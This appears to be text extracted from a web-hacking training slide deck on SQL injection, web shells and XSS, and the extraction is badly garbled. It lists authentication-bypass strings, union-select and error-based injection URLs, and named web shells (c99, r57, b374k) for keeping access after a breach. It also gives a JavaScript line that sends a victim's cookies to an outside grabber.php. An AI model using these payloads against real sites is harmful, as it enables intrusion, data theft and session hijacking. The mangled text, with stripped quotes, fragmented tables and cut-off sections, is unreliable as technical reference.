Beruflich Dokumente
Kultur Dokumente
Session Flow
Web Architecture
Security Misconceptions
Latest Threats on Web
SQL Basics
SQL Injection Authentication Bypass
SQL Injection Union Based
SQL Injection Error Based
Control Panel
Session Flow
Web Architecture
Web Architecture is nothing but a simple client-server model.
All the users of the internet are clients and the web pages
which they are viewing are on the Web Server.
Web Server contains one or more than one websites on it.
Web Architecture
Client requests the server for the web page and as the
response of it, server sends the appropriate data.
It seems very simple but to in real our request has to pass
from many servers and if the response is positive only then it
gets the page.
Different types of server:
Application Server
Backup Server
Mail Server
DB Server
File Sharing & Printing Server Web Server
Etc, etc, etc
Etc, etc, etc
Security Misconceptions
The Firewall protects my web server and database
Access to the server through ports 80 and 443 makes the web
server part of your external perimeter defense.
Vulnerabilities in the web server software or web applications
may allow access to internal network resources.
Security Misconceptions
The IDS & IPS protects my web server and database
The IDS is configured to detect signatures of various wellknown attacks.
Attack signatures do not include those for attacks against
custom applications.
It keeps the log of the events and all the actions performed by
users which is practically not possible to monitor.
Security Misconceptions
SSL secures the website
SSL secures the transport of data between the web server and
the users browser.
SSL does not protect against attacks against the server and
applications.
SSL is the hackers best friend due to the false sense of
security.
Latest Threats
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
SQL Basics
SQL : Sql stands for the Structured Query Language.
It is meant for the communication between database and
application.
SQL Basics
We can use default statements of SQL for the data
manipulation.
SELECT Statement
INSERT INTO Statement
UPDATE Statement
DELETE Statement
SQL Basics
SQL allows one to perform various operations on tables, i.e. to
define data structure.
CREATE TABLE
ALTER TABLE
DROP TABLE
DELETE TABLE
SQL Basics
Select Statement is used to select data from the table.
Insert into Statement is used to insert data into already
created table.
Update Statement is used to update the data of column from
the table.
Delete Statement is used to delete the data from column.
SQL Basics
Sample Database
SQL Basics
Sample Database
The sample database name is : NewsDB
It contains one table : News
Four columns are :
ID
NewsTitle
NewsContent,
NewsAuthor
SQL Basics
Sample Queries
Query : Select * from news;
The execution of this query will return all the data from news table.
SQL Basics
Sample Queries
Query : Select news_content,news_title from news where
ID=3;
The execution of this query will return only that data of news content and
news title column from news table where ID columns value is 3.
SQL Basics
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
pages,
and
One
page
of
the
website
is,
www.site.com/adminlogin.php
We can assume the details behind the code is,
Database
Table Name
adminlogin Columns
: SiteDB
: userlogin, adminlogin, news, etc
: adminid, pass
SQL Basics
To login to the adminlogin.php page, whenever the admin will
enter the adminid and password, a query will executed on
adminlogin table, the query will look somewhat like,
select * from adminlogin where adminid=<value> and
pass=<value>;
i.e. : select * from adminlogin where adminid=admin and
pass=adminpass;
If the username and password are correct then admin will be
able to login with the username admin and password
adminpass
SQL Injection
SQL Injection is a method of injecting SQL queries into the
website, by injecting our malicious queries hacker can easily,
Bypass the authentication
Grab the Structure of the database
Grab the sensitive data
Authentication Bypass
Sample Scenario
There is a website, site.com
The website is nothing but a group of more than one web
pages,
and
One
page
of
the
website
is,
www.site.com/adminlogin.php
We can assume the details behind the code is,
Database
Table Name
adminlogin Columns
: SiteDB
: userlogin, adminlogin, news, etc
: adminid, pass
Authentication Bypass
To login to the adminlogin.php page, whenever the admin will
enter the adminid and password, a query will executed on
adminlogin table, the query will look somewhat like,
select * from adminlogin where adminid=<value> and pass=<value>;
Authentication Bypass
But what if some one is passing or0=0 as password ???
The query would be,
select * from adminlogin where adminid=admin and
pass=or0=0 ;
What ever we will pass as value, it will be passed between
two single quotes, i.e. : <value>
Authentication Bypass
Authentication Bypass
The query will be divided into two parts,
select * from adminlogin where adminid=admin
pass=or0=0;
Here, the condition 0=0 will result positively
authentication will be bypassed !
We can try to put the same or0=0 as the username
password if needed.
It is to be understood that we can replace 0 with 1,X
i.e. : or1=1
orX=X
As per the surveys, still more than 65% websites
vulnerable with this injection.
and
and
and
are
Authentication Bypass
Sample Keywords
or 1'=1
or x='x
or 0=0
or 0=0
or 0=0
or 0=0 #
or 0=0 #
or 0=0 #
or x='x
or x=x
) or (x='x
or 1=1
or 1=1
or 1=1
or a=a
or a=a
) or (a='a
) or (a=a
hi or a=a
hi or 1=1
hi or 1=1
or1=1'
It
contains
all
the
Hollywood
E_ID
E_Name
E_ID
E_Name
1
2
3
Vidit Baxi
Shahrukh Khan
John Abraham
1
2
3
Vidit Baxi
Jim Carrey
Daniel Craig
Now we want to list all the different actors from bollywood and
hollywood, we use the following SELECT statement:
E_Name
E.g.: SELECT E_Name FROM Bollywood
Vidit Baxi
UNION
Shahrukh Khan
SELECT E_Name FROM Hollywood
John Abraham
The result-set will look like this:
Jim Carrey
Daniel Craig
The ORDER BY Keyword : The ORDER BY keyword is used to sort the result-
E_Name
John Abraham
Vidit Baxi
Shahrukh Khan
Shahid Kapoor
E_Name
Vidit Baxi
John Abraham
Shahid Kapoor
Shahrukh Khan
Union Based
Blank Page
i.e. :
http://www.site.com/product.php?id=-4 union select 1,2,3,4 -http://www.site1.com/list.php?catid=-3 union select 1,2,3,4 -http://www.site2.com/product.php?product=-car union select
1,2,3,4 --
Database
Sometimes you may get all the table names but sometimes
you will get only the 1st table so to get all the tables names
together
Column Name
Column name
All columns
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1 points
here
This query will select 1st table from
information_schema.tables
i.e. : the selected table name is
users.
l logic,
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1 points
here
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here
Table 1
Table 2
Table 3
Table 4
Table 5
Table 6
Information_schema
Top 1, now
points here
column 1
column 2
admin
Top 1 points
here
Top 1 points
here
admin
To fetch the second column, edit the query,
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top
1 column_name from information_shema.columns where
table_name=Table-1 and column_name not in(col1))) --
Top 1, now
points here
admin
To fetch the second column, edit the query,
http://www.site.com/product.aspx?id=4 and 1=convert(int,(select top
1 column_name from information_shema.columns where
table_name=Table-1 and column_name not in(col1))) --
After fetching the proper table name and column names, we can
fetch the data from the tables.
Column 2
Data 1
Data 5
Data 2
Data 6
Data 3
Data 7
Data 4
Data 8
admin
Top 1 points
here
Control Panel
Control panels can be classified of 3 types.
Domain Control Panel Whenever one buys a domain,
Domain Provider assigns you a control panel where you can
add , edit, and delete the domain related resources like DNS ,
Sub Domain, etc.
Hosting Control Panel Whenever one buys a hosting space
to host the website, Hosting Provider assigns you a control
panel where you can add, edit and delete the pages of the
website.
Control Panel
Admin Control Panel Whenever one creates website , for
the content management , developer puts a page where one
can add, edit and delete the data.
Control Panel
After getting access of the website, a hacker will try to get
access of the admin control panel, where a hacker can add,
edit, delete and modify the data.
A White Hat Hacker may not do anything but a Black Hat
Hacker may delete the data also and even can upload another
control panel. Hackers control panel can harm not only one
website but all the websites. If hacker is able to get root
access on the server, all the websites can be defaced or the
database can be tampered.
Control Panel
Domain Control Panel
Control Panel
Hosting Control Panel
Control Panel
Admin Panel
Control Panel
Understanding the control panel is the most important part of
the web security.
A control panel comes with good number of options. One
needs to choose the appropriate option for the website.
Control Panel
Control Panel
Control Panel
Control Panel
Online File Manager
Control Panel
As a part of the Gaining Access Phase, hacker hacks into the
website, then gets the access to the control panel. But to
mention the access on the website, hacker uploads another
control panel, Hacker Control Panel.
Hacker Control Panels are same as the general control panels.
Hacker control panels are known as shell.
From the hacker control panel, Hacker can get access to the
database, upload content, execute commands on the server,
delete existing files, edit source code of the pages, and Deface
the website.
Hacker can also get the root access on the server. This may
allow hacker to hack into the other websites of the same
server.
Control Panel
Shell for windows platform and Linux platform are different.
For windows platform hackers can use,
k shell
Asp shell
Devilz shell
Etc, etc, etc
Control Panel
b374k Shell
Control Panel
c99 Shell
Control Panel
devilz Shell
Control Panel
k Shell
Control Panel
r57 Shell
Upload Option
Uploaded Content
XSS
XSS, the Cross Site Scripting.
Its a vulnerability which is found very frequently in the
websites which enables the attacker to inject the client side
scripts into the website.
The Attacker sends the vulnerable website with his malicious
script to the other user, when browser receives all the scripts,
it assumes all the scripts have come from the trusted source
and because of that victim gets compromised.
Generally this vulnerability is found in the search box, shout
box, comment box etc It can also be found by the same way
we can find SQL Injections.
XSS
Just to verify whether the website is vulnerable with the XSS
vulnerability or not, hacker can try the following script in the
search box or the comment box.
<script>alert(Vidit)</script>
or
<script>alert(Vidit)</script>
or
<script>alert(0)</script>
If the website is loading with the alert box, than the website is
vulnerable with XSS Vulnerability.
XSS
There is no single, standardized classification of cross-site
scripting flaws but primarily we can divide XSS into the 2
types.
1.
2.
XSS
2. Reflected XSS Vulnerability
When a hacker injects the malicious script into the
website, unlike the persistent one, the code is not
injected into the source of the website. It stays limited up
to the browser. In this case, hacker will send the website
link along with the malicious script to the other user, so
along with the website data, the script will also be
executed.
XSS
Sample Attacks
1.
2.
3.
4.
XSS
1. Cross Frame Scripting
Cross Frame Scripting is one of the dangerous out come of the
Cross Site Scripting Vulnerability.
A Hacker can use frame script of HTML to load other
website in a frame of the vulnerable website.
The hacker may also load the pages of the same website,
i.e. Login page of the bank website
Victim checks the URL which is always found to be the
trusted and gets hacked.
Generally hackers prefer to load a phishing page in the
frame.
XSS
As an example,
<IFRAME SRC=http://www.site.com />
We can assume the site.com as the phishing page or the page of the
other website.
XSS
XSS
XSS
2. Cross Site Request Forgery (CSRF/XSRF)
Cross Site Request Forgery vulnerability in any website allows
the hacker to send a page link which contains some malicious
code and can also compromise the victim data.
A Hacker can use image script of HTML to simply load any
image of the any website.
The hacker may also try to use a website link instead of
using image path, it may also hijack user session.
Victim checks the URL which is always found to be the
trusted and gets hacked.
Generally hackers prefer to load a session hijacking exploit
in the frame.
XSS
As an example,
<IMG SRC=http://www.site.com/images/image1.jpg />
This query may load the image of the site.com on the website
page.
This query may not load any image but it may force the user to
do the transaction if the user is already authenticated on the
website.
XSS
XSS
And the as the result, it is loading the image of the actual hero
of the India.
XSS
The same way, a hacker can also load session hijacking or any
other malicious query along with the IMG SRC tag.
XSS
3. DOM Based Attack :
XSS
3. Session Hijacking:
Session Hijacking is one of the most dangerous vulnerability exists
in the web applications.
XSS
XSS
The hacker can grab the client side cookie of the user and can
use that to be authenticated from the server side cookie.
XSS
XSS
Javascript:document.location=http://www.site.com/grabber.php?cookie=.concat
(escape(document.cookie));
As per our code, the cookie will be stored into the cookies.txt
file. The session contains two variables, referrer and cookie,
the attacker needs to edit both the variables into the browser
while opening the website.
Thus the installed session of the victim will act as a client side
cookie and server side cookie will give positive response.